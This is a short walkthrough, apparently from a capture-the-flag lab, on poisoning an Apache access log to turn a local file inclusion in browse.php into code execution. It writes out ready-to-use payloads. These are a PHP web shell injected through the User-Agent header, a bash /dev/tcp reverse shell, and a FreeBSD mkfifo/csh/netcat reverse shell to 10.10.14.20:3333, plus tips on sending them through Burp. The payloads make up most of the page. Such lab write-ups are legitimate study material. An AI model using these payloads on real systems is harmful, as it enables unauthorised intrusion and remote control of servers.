Apache log
Example from 10.10.10.84
Url http://10.10.10.84/browse.php?file=/var/log/httpd-access.log exposing apache log files:
Error message when contaminating the log with:
1
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/3333 0>&1'");?>
Copied!
Second try (reason for error message was that " character could not be processes by the log file). Changing to :
1
User-Agent: <?php system($_REQUEST['cmd']); ?>
Copied!
We gain code execution through LFI:
The same request in Burp (useful when log files are full of data)
Gaining a reverse shell from FreeBSD through LFI with:
1
if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 10.10.14.20 3333 > /tmp/OGfWimIImwJMI
Copied!
1
Mind the /bin/csh, as users on this box do not have bash!
Copied!
Make sure you URL encode the command in Burp before sending:
Result:
Reference:
Shellpop - allowed me to construct the reverse shell for freeBSD.
Copy link